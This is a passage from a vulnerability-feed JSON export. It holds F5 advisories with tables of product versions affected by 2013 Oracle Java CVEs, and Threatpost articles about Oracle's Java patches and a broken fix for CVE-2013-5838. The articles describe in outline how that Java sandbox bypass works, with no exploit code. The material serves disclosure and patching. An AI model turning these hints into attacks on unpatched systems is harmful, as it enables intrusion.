"2017-06-08T00:16:29"}, {"id": "F5:K48802597", "type": "f5", "title": "Java vulnerabilities CVE-2013-5825 and CVE-2013-5830 ", "description": "\nF5 Product Development has assigned IDs 419633 and 565169 (BIG-IP), ID 562118 (Enterprise Manager and BIG-IQ), ID 552323 (ARX), and INSTALLER-1887 (Traffix SDC) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.6.0 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n10.1.0 - 11.4.1| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP AAM| 11.6.0 \n11.4.0 - 11.5.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.4.0 - 11.4.1| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP AFM| 11.6.0 \n11.3.0 - 11.5.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.3.0 - 11.4.1| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP Analytics| 11.6.0 \n11.0.0 - 11.5.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.0.0 - 11.4.1| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP APM| 11.6.0 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP ASM| 11.6.0 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP DNS| None| 12.0.0 - 12.1.0| None| None \nNone| 12.0.0 - 12.1.0| None| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| High| Java, iControl REST \n11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| High| Configuration utility \nBIG-IP GTM| 11.6.0 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| 11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP Link Controller| 11.6.0 \n11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP PEM| 11.6.0 \n11.3.0 - 11.5.4| 12.0.0 - 12.1.0 \n11.6.1 \n11.5.4 HF2| High| Java, iControl REST \n11.3.0 - 11.4.1| 12.0.0 - 12.1.0 \n11.5.0 - 11.6.1| High| Configuration utility \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| High| Java, iControl REST \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| High| Configuration utility \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| High| Java, iControl REST \n11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| High| Configuration utility \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| High| Java, iControl REST \n11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| High| Configuration utility \nARX| 6.0.0 - 6.4.0| None| Low| Java \nEnterprise Manager| 3.0.0 - 3.1.1| None| High| Java \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.4.0 HF2| 4.5.0| High| Java \nBIG-IQ Device| 4.0.0 - 4.4.0 HF2| 4.5.0| High| Java \nBIG-IQ Security| 4.0.0 - 4.4.0 HF2| 4.5.0| High| Java \nBIG-IQ ADC| None| 4.5.0| High| Java \nBIG-IQ Centralized Management| None| None| Not Vulnerable| None \nBIG-IQ Cloud and Orchestration| None| None| Not Vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.0.5| 5.0.0 \n4.4.0| Low| Java\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP, Enterprise Manager, and BIG-IQ\n\n**Impact of action:** Performing the following mitigation should not have a negative impact on your system.\n\nTo mitigate this vulnerability, you can limit access to the management port, Configuration utility, and iControl REST functionality to authorized users only.\n\nTraffix SDC\n\n**Impact of action:** Performing the following mitigation should not have a negative impact on your system.\n\nAn updated JDK 1.6.60 is available from F5 via a Traffix SDC security bulletin. For more information, contact your Traffix SDC technical support representative.\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n", "published": "2016-06-09T20:20:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://support.f5.com/csp/article/K48802597", "cvelist": ["CVE-2013-5830", "CVE-2013-5825"], "lastseen": "2017-06-08T00:16:02"}, {"id": "SOL48802597", "type": "f5", "title": "SOL48802597 - Java vulnerabilities CVE-2013-5825 and CVE-2013-5830", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP, Enterprise Manager, and BIG-IQ\n\n**Impact of action:** Performing the following mitigation should not have a negative impact on your system.\n\nTo mitigate this vulnerability, you can limit access to the management port, Configuration utility, and iControl REST functionality to authorized users only.\n\nTraffix SDC\n\n**Impact of action:** Performing the following mitigation should not have a negative impact on your system.\n\nAn updated JDK 1.6.60 is available from F5 via a Traffix SDC security bulletin. For more information, contact your Traffix SDC technical support representative.\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "published": "2016-06-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/k/48/sol48802597.html", "cvelist": ["CVE-2013-5830", "CVE-2013-5825"], "lastseen": "2016-09-26T17:23:13"}, {"id": "F5:K53316849", "type": "f5", "title": "Java vulnerability CVE-2013-5802", "description": "\nF5 Product Development has assigned ID 562118 (Enterprise Manager), ID 552323 (ARX) and INSTALLER-1887 (Traffix) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Java \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| Java \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.4.0 HF2| 4.5.0| High| Java \nBIG-IQ Device| 4.2.0 - 4.4.0 HF2| 4.5.0| High| Java \nBIG-IQ Security| 4.0.0 - 4.4.0 HF2| 4.5.0| High| Java \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.1.0 \n3.3.2 - 3.5.1| 5.0.0 \n4.4.0| Low| Java\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n", "published": "2016-05-24T19:32:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://support.f5.com/csp/article/K53316849", "cvelist": ["CVE-2013-5802"], "lastseen": "2017-06-08T00:16:18"}, {"id": "SOL53316849", "type": "f5", "title": "SOL53316849 - Java vulnerability CVE-2013-5802", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL12766: ARX hotfix matrix\n", "published": "2016-05-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/k/53/sol53316849.html", "cvelist": ["CVE-2013-5802"], "lastseen": "2016-09-26T17:22:55"}, {"id": "F5:K61971428", "type": "f5", "title": "Multiple Java vulnerabilities", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "published": "2016-05-23T22:17:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://support.f5.com/csp/article/K61971428", "cvelist": ["CVE-2013-5846", "CVE-2013-5788", "CVE-2013-5810", "CVE-2013-5851", "CVE-2013-5854", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5775", "CVE-2013-5844", "CVE-2013-5800", "CVE-2013-5777", "CVE-2013-5838"], "lastseen": "2017-06-08T00:16:25"}], "threatpost": [{"id": "ORACLE-QUARTERLY-UPDATE-INCLUDES-PATCHES-FOR-50-REMOTELY-EXECUTABLE-JAVA-BUGS/102596", "type": "threatpost", "title": "October 2013 Oracle Java Critical Patch Update", "description": "On Tuesday, for the first time, Java security updates were included with the quarterly [Oracle Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html>) \u2013 and just as quickly, Java wasted no time elevating itself as the top concern for Oracle admins and security experts.\n\nOf the 51 Java patches released, 50 allow for remote code execution and 20 were given the highest criticality rating by Oracle.\n\n### Related Posts\n\n#### [Breach Forces Password Change on Oracle MICROS PoS Customers](<https://threatpost.com/breach-forces-password-change-on-oracle-micros-pos-customers/119754/> \"Permalink to Breach Forces Password Change on Oracle MICROS PoS Customers\" )\n\nAugust 8, 2016 , 5:21 pm\n\n#### [Oracle EBusiness Suite \u2018Massive\u2019 Attack Surface Assessed](<https://threatpost.com/oracle-ebusiness-suite-massive-attack-surface-assessed/119638/> \"Permalink to Oracle EBusiness Suite \u2018Massive\u2019 Attack Surface Assessed\" )\n\nAugust 3, 2016 , 10:14 pm\n\n#### [Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/> \"Permalink to Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update\" )\n\nJuly 20, 2016 , 9:21 am\n\n\u201cThe majority of vulnerabilities are concentrated on the Java client side, i.e. in desktop/laptop deployments, with the most common attack vector being web browsing and malicious web pages, but there are two highly critical vulnerabilities that also apply to server installations,\u201d said Qualys CTO Wolfgang Kandek.\n\nUsers are urged to immediately upgrade Java to version 7 update 45; Java 6 installations are also vulnerable to close to a dozen critical vulnerabilities, experts said, adding that users should avoid enabling the plug-in altogether, or isolate Java 6 machines.\n\n\u201cIdeally, users will disable Java plugins unless it is specifically needed and then run it only in a browser which you only use for those one or two sites that require the plugin,\u201d said Ross Barrett, senior security engineer at Rapid7. \u201cOtherwise, run Java in the most restricted mode and only allow signed applets from white-listed sites to run.\u201d\n\nJava 6, however, is no longer supported by Oracle and security patches are not being developed.\n\n\u201cThe recommended action for Java 6 here is to upgrade to Java 7 if possible,\u201d Kandek said. \u201cIf you cannot upgrade, I would recommend to isolate the machine that needs Java 6 running and not use it for any other activities that connect it to the Internet, such as e-mail and browsing.\u201d\n\nExperts remind users too that the latest Java updates also include code-signing restrictions and pop-ups warning users that unsigned Java applets pose a security risk and that they won\u2019t execute automatically by default.\n\nNoted Java bug hunter Adam Gowdiak told Threatpost that the patches also harden interactions of LiveConnect code, a browser feature that allows applets to communicate with the javascript engine in the browser, and Java Rich Internet Applications.\n\n\u201cWith that respect, some extra warning dialogs are displayed to the user prior to allowing the calls from JavaScript to Java,\u201d Gowdiak said, adding that Oracle has also patched a [Reflection API vulnerability](<http://threatpost.com/old-attack-exploits-new-java-reflection-api-flaw>) he submitted to the company.\n\nOn the server side, CVE-2013-5782 and CVE-2013-5830 were patched. The vulnerabilities were found in Oracle JRockit, the Java virtual machine built into its Oracle Fusion Middleware.\n\n\u201cBesides the Java patches, nothing else jumps out as particularly interesting,\u201d Rapid7\u2019s Barrett said.\n\nOverall, there are 127 patches in the Oracle CPU that touch most of the Oracle product line. Aside from the Java vulnerabilities, the only other bug approaching the same level of criticality is in MySQL Enterprise Monitor, but it is not a remote execution bug. MySQL Enterprise Monitor is a real-time management interface that watches over MySQL databases for performance, availability and security.\n\nDatabase managers should be aware of four patches for Oracle RDBMS, all of which are remotely exploitable, though Kandek points out that Oracle databases are not exposed to the Internet.\n\nThere are 17 patches for Oracle Fusion Middleware, a dozen of which are remotely exploitable. The Outside In document viewing component of Fusion used also in Microsoft Exchange installations is also patched in this update. The feature gained some attention with the [August Microsoft Patch Tuesday updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws>). An attacker could gain remote access by enticing a user to open a malicious file with Outlook Web Access.\n\nOracle also released a dozen patches for its Sun product line, including a bug in Sun\u2019s SPARC server management module that could give an attacker access to a number of important management features.\n\nThe remaining patches address security vulnerabilities in Oracle Enterprise Manager Grid Control, a number of Oracle business applications including Supply Chain, PeopleSoft, Siebel and iLearning, Industry, Financial, and Primavera apps.", "published": "2013-10-16T07:41:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/oracle-quarterly-update-includes-patches-for-50-remotely-executable-java-bugs/102596/", "cvelist": ["CVE-2013-5782", "CVE-2013-5830"], "lastseen": "2016-09-04T20:48:00"}, {"id": "BROKEN-2013-JAVA-PATCH-LEADS-TO-SANDBOX-BYPASS/116757", "type": "threatpost", "title": "Broken 2013 Java Patch Leads to Sandbox Bypass", "description": "Java\u2019s miserable 2013 just will not go away.\n\nOne of the endless parade of bugs found in the platform throughout 2013\u2014many of which were zero-day vulnerabilities exploited in targeted attacks\u2014apparently wasn\u2019t closed off completely by an [October 2013 patch](<https://threatpost.com/oracle-quarterly-update-includes-patches-for-50-remotely-executable-java-bugs/102596/>) released by Oracle.\n\n### Related Posts\n\n#### [Breach Forces Password Change on Oracle MICROS PoS Customers](<https://threatpost.com/breach-forces-password-change-on-oracle-micros-pos-customers/119754/> \"Permalink to Breach Forces Password Change on Oracle MICROS PoS Customers\" )\n\nAugust 8, 2016 , 5:21 pm\n\n#### [Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/> \"Permalink to Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update\" )\n\nJuly 20, 2016 , 9:21 am\n\n#### [Oracle Fixes 136 Vulnerabilities With April Critical Patch Update](<https://threatpost.com/oracle-fixes-136-vulnerabilities-with-april-critical-patch-update/117548/> \"Permalink to Oracle Fixes 136 Vulnerabilities With April Critical Patch Update\" )\n\nApril 20, 2016 , 1:26 pm\n\nResearchers at Polish security company Security Explorations last week disclosed that Oracle\u2019s patch for [CVE-2013-5838](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838>), which the company privately disclosed in July 2013, [could be trivially sidestepped](<http://www.security-explorations.com/materials/SE-2012-01-ORACLE-14.pdf>) resulting in a Java sandbox bypass.\n\nA request for comment from Oracle as to whether it has confirmed the bypass and what its plans are for an updated patch were not returned in time for publication.\n\nSecurity Explorations founder and CEO Adam Gowdiak said he has not been contacted by Oracle since last week\u2019s disclosure. Gowdiak not only released his findings on the [Full Disclosure mailing list](<http://seclists.org/fulldisclosure/2016/Mar/31>), but also at the JavaLand conference; he told Threatpost that Oracle representatives were speakers at the event and hosted a booth in the expo hall.\n\n\u201cThey should [fix this], but it\u2019s hard to speculate on whether and when this will happen,\u201d Gowdiak said.\n\nThe public disclosure, Gowdiak said, is a reflection of his company\u2019s new policy around broken fixes.\n\n\u201cAs a result, we do not tolerate broken fixes any more,\u201d Gowdiak wrote in an email to the Full Disclosure list. \u201cIf an instance of a broken fix for a vulnerability we already reported to the vendor is encountered, it gets disclosed by us without any prior notice.\u201d\n\nGowdiak said that the original vulnerability and an [insecure implementation of the Reflection API](<https://threatpost.com/old-attack-exploits-new-java-reflection-api-flaw/101388/>) that could be exploited by a class-spoofing attack against the Java virtual machine. Oracle said it backported from the Java Development Kit 8 a patched implementation of the method handles API to address the vulnerability.\n\nThe researchers, however, said that a four-character change to the proof-of-concept code sent to Oracle along with the original private disclosure could bypass sandbox protections in Java.\n\n\u201cIt\u2019s rather easy to exploit\u201d Gowdiak said. \u201cA malicious Java applet needs to be fetched from a custom HTTP (WWW) server. The reason for it is that the server needs to respond with a \u201cNot found\u201d error when a given Java class file is requested for the first time.\u201d\n\nGowdiak said that the new attack was verified in Java SE 7 Update 97, Java SE 8 Update 74, and Java SE 9 Early Access Build 108. Gowdiak added that the attack does not bypass updated Java security levels or Java Click2Play, which prevents the automatic execution of unsigned Java applets.\n\nGowdiak also said that Oracle downplayed the potential impact of the vulnerability, that it could be exploited only through sandboxed Java Web Start applications and sandboxed Java applets.\n\n\u201cThis is not true,\u201d Gowdiak said. \u201cWe verified that it could be successfully exploited in a server environment as well such as Google App Engine for Java.\u201d", "published": "2016-03-14T09:24:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/broken-2013-java-patch-leads-to-sandbox-bypass/116757/", "cvelist": ["CVE-2013-5838"], "lastseen": "2016-09-04T20:45:27"}, {"id": "EMERGENCY-JAVA-PATCH-RE-ISSUED-FOR-2013-VULNERABILITY/116967", "type": "threatpost", "title": "Emergency Java Patch Re-Issued for 2013 Vulnerability", "description": "Oracle yesterday released an [emergency patch](<http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0636-2949497.html>) for a Java vulnerability that was improperly patched in 2013.\n\nResearchers at Security Explorations in Poland two weeks ago disclosed that a Java patch for an issue the company reported in 2013, CVE-2013-5838, was still [trivially exploitable](<https://threatpost.com/broken-2013-java-patch-leads-to-sandbox-bypass/116757/>), and it enabled attackers to remotely execute code and bypass the Java sandbox.\n\n### Related Posts\n\n#### [Breach Forces Password Change on Oracle MICROS PoS Customers](<https://threatpost.com/breach-forces-password-change-on-oracle-micros-pos-customers/119754/> \"Permalink to Breach Forces Password Change on Oracle MICROS PoS Customers\" )\n\nAugust 8, 2016 , 5:21 pm\n\n#### [Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/> \"Permalink to Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update\" )\n\nJuly 20, 2016 , 9:21 am\n\n#### [Oracle Fixes 136 Vulnerabilities With April Critical Patch Update](<https://threatpost.com/oracle-fixes-136-vulnerabilities-with-april-critical-patch-update/117548/> \"Permalink to Oracle Fixes 136 Vulnerabilities With April Critical Patch Update\" )\n\nApril 20, 2016 , 1:26 pm\n\nOracle did not confirm many details in its advisory Wednesday, other than to urge users to patch immediately since [details on the flaw](<http://www.security-explorations.com/materials/SE-2012-01-ORACLE-14.pdf>) were publicly available. Java SE 7 Update 97 and Java 8 Update 73 and 74 for Windows, Mac OS X, Linux and Solaris are vulnerable, Oracle said. Security Explorations founder Adam Gowdiak told Threatpost today that the patch correctly addressed the flaw.\n\n\u201cWe ran our POC code and found out that it stopped working. We don\u2019t expect the patch to be broken again as Oracle is now aware of our modified disclosure policy,\u201d he said.\n\nSecurity Explorations released the details in a paper and during a talk at the JavaLand conference. The public disclosures, Gowdiak said, reflect a new policy for the company around broken patches for vulnerabilities it discloses to vendors.\n\n\u201cIf an instance of a broken fix for a vulnerability we already reported to the vendor is encountered, it gets disclosed by us without any prior notice,\u201d Gowdiak wrote to the [Full Disclosure](<http://seclists.org/fulldisclosure/2016/Mar/31>) mailing list.\n\nGowdiak told Threatpost that the original vulnerability was an insecure implementation of the Reflection API that could be exploited by a class-spoofing attack against the Java virtual machine. Oracle said it backported from the Java Development Kit 8 a patched implementation of the method handles API to address the vulnerability.\n\nThe Security Explorations researchers, however, said that a four-character change to the proof-of-concept code sent to Oracle along with the original private disclosure could bypass sandbox protections in Java. \u201cIt\u2019s rather easy to exploit\u201d Gowdiak said. \u201cA malicious Java applet needs to be fetched from a custom HTTP (WWW) server. The reason for it is that the server needs to respond with a \u201cNot found\u201d error when a given Java class file is requested for the first time.\u201d", "published": "2016-03-24T12:05:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/emergency-java-patch-re-issued-for-2013-vulnerability/116967/", "cvelist": ["CVE-2013-5838"], "lastseen": "2016-09-04T20:50:45"}], "nessus": [{"id": "SUSE_SU-2013-1669-1.NASL", "type": "nessus", "title": "SUSE SLES10 Security Update : IBM Java 5 (SUSE-SU-2013:1669-1)", "description": "IBM Java 5 